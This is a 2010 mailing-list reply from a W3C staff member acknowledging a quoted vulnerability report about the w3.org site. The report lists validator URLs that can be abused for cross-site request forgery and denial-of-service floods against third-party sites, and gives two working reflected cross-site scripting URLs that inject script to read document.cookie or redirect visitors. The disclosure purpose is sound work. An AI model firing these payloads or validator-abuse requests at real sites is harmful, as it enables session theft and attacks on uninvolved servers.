Re: Vulnerabilities at www.w3.org

Wed, 30 Jun 2010 08:40:00 -0700 


On 30 Jun 2010, at 4:34 AM, MustLive wrote:


Hello administrator of www.w3.org!

I want to warn you about security vulnerabilities at your site.



Hi ML,
Thanks for sending this to us. We are aware of this and are looking into finding the right balance between continuing to offer services and to avoid abuse. 

Best,

_ Ian
These are Abuse of Functionality, Insufficient Anti-automation and Cross-Site Scripting vulnerabilities. 

Abuse of Functionality:
This functionality can be used for conducting of CSRF attacks on other sites. 

http://validator.w3.org/feed/check.cgi?url=http://google.com

http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl

http://validator.w3.org/check?uri=http://google.com

http://jigsaw.w3.org/css-validator/validator?uri=http://google.com

http://validator.w3.org/checklink?uri=http://google.com
Note, that service W3C Link Checker can be used for scanning of whole site and so it consumes more resources, as of W3C's server, as of site which is scanning. It can be used for conducting of DoS attacks on mentioned servers. About such attacks I mentioned in article DoS attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/ ). 

http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance

http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com

Insufficient Anti-automation:
At these pages there is no protection from automated requests (captcha). Which allows to automate process of conducting of CSRF attacks at other sites. 

XSS (IE):

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl

Works only in Internet Explorer.
Attend to security of all of yours web sites, web software and to security audit.
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4320/ ). 

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


--
Ian Jacobs ([email protected])    http://www.w3.org/People/Jacobs/
Tel:                                      +1 718 260 9447

Reply via email to